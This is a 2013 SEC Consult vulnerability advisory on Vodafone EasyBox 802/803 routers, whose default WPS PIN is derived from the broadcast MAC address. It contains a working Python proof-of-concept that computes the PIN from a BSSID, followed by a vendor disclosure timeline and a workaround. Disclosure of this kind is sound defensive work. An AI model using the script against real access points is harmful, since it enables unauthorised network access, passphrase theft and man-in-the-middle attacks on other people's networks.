SEC Consult Vulnerability Lab Security Advisory < 20130805-0 >
=======================================================================
title: Vodafone EasyBox Default WPS PIN Algorithm Weakness
product: EasyBox 802 & EasyBox 803
vulnerable version: EasyBox 802 - all versions
EasyBox 803 - Production date before August 2011
fixed version: EasyBox 802 - no vendor patch available
EasyBox 803 - Production date after August 2011
impact: Critical
homepage: www.vodafone.de
found: 2012-12-01
by: Stefan Viehböck
SEC Consult Vulnerability Lab
=======================================================================
Vendor/product description:
-----------------------------
These DSL home gateways are manufactured by Arcadyan/Astoria Networks and are
rebranded for Vodafone Germany. A Wi-Fi AP is enabled by default and can be
accessed with the default WPS PIN (PIN External Registrar) printed on the back
of the device.
Vulnerability overview/description:
-----------------------------------
The algorithm that generates the default WPS-PIN is entirely based on the MAC
address (=BSSID) and serial number of the device. The serial number can be
derived from the MAC address.
An unauthenticated attacker within the range of the access point can capture
the BSSID (eg. from 802.11 Beacon Frames) and calculate the default WPS PIN
for it. This PIN can then be used to retrieve the current access point
configuration (including the WPA passphrase) or to change the configuration
(SSID, encryption method, passphrase, ...) of the access point.
An attacker can afterwards connect to the access point and perform malicious
activities such as Man-in-the-middle attacks using ARP spoofing, attack clients
on the internal network, etc.
Proof of concept:
-----------------
A script that implements the derivation algorithm has been developed:
#!/usr/bin/env python
import sys, re
def gen_pin (mac_str, sn):
mac_int = [int(x, 16) for x in mac_str]
sn_int = [0]*5+[int(x) for x in sn[5:]]
hpin = [0] * 7
k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) & 0xF
k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) & 0xF
hpin[0] = k1 ^ sn_int[9];
hpin[1] = k1 ^ sn_int[8];
hpin[2] = k2 ^ mac_int[9];
hpin[3] = k2 ^ mac_int[10];
hpin[4] = mac_int[10] ^ sn_int[9];
hpin[5] = mac_int[11] ^ sn_int[8];
hpin[6] = k1 ^ sn_int[7];
pin = int('%1X%1X%1X%1X%1X%1X%1X' % (hpin[0], hpin[1], hpin[2], hpin[3], hpin[4], hpin[5], hpin[6]), 16) % 10000000
# WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or
# http:// download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc
accum = 0
t = pin
while (t):
accum += 3 * (t % 10)
t /= 10
accum += t % 10
t /= 10
return '%i%i' % (pin, (10 - accum % 10) % 10)
def main():
if len(sys.argv) != 2:
sys.exit('usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py 38:22:9D:11:22:33\n')
mac_str = re.sub(r'[^a-fA-F0-9]', '', sys.argv[1])
if len(mac_str) != 12:
sys.exit('check MAC format!\n')
sn = 'R----%05i' % int(mac_str[8:12], 16)
print 'derived serial number:', sn
print 'SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c' % (mac_str[6], mac_str[7], mac_str[8], mac_str[9], sn[5], sn[9])
print 'WPS pin:', gen_pin(mac_str, sn)
if __name__ == "__main__":
main()
Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in EasyBox 802 and EasyBox 803,
both produced by Arcadyan/Astoria Networks. Other devices of this vendor
(including EasyBox 903) might be affected as well. Vodafone did not provide
any information on this.
According to Vodafone / CERT-Bund, the following devices are vulnerable:
EasyBox 802 - all versions
EasyBox 803 - production date before August 2011
Vendor contact timeline:
------------------------
2012-12-14: Contacting Vodafone via customer support.
2013-01-09: Vodafone refers to datenschutz@vodafone.com.
2013-01-10: Requesting encryption keys.
2013-01-14: Vodafone provides encryption keys.
2013-01-15: Sending advisory and proof of concept exploit via encrypted
channel.
2013-01-25: Sending reminder regarding SEC Consult disclosure policy.
2013-01-25: Automatic response: Out of office until 2013-02-24.
2013-01-25: Requesting new contact person from CSIRT-DE@vodafone.com
and DU-DE-ZV-MXL-CSIRT-DE@vodafone.com.
2013-01-28: Vodafone acknowledges receipt of advisory.
2013-02-05: Vodafone confirms validity of provided information, gives
information about some newer devices which are not affected,
mentions that customers have already been notified to change
"default passwords" (no details given).
2013-02-21: Requesting information regarding affected products/product versions,
clarification regarding "default passwords", URLs/communication
channels used for mentioned notifications, ways for identifying
vulnerable devices (end users), ...
2013-03-13: Still no response - sending deadline dates
2013-05-29: Contacting German CERT-Bund for further coordination in order to
warn end users
2013-08-05: Coordinated release of advisory with German CERT-Bund
Solution:
---------
Vodafone does not provide a solution for the affected devices.
Workaround:
-----------
Either change the WPS PIN or disable WPS entirely.
SEC Consult could not confirm if WPS actually is disabled (as opposed to just
not being advertised), so both changing the PIN and disabling WPS is
recommended.
Advisory URL:
--------------
www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: www.sec-consult.com
Blog: blog.sec-consult.com
Twitter: twitter.com/sec_consult
EOF Stefan Viehböck / @2013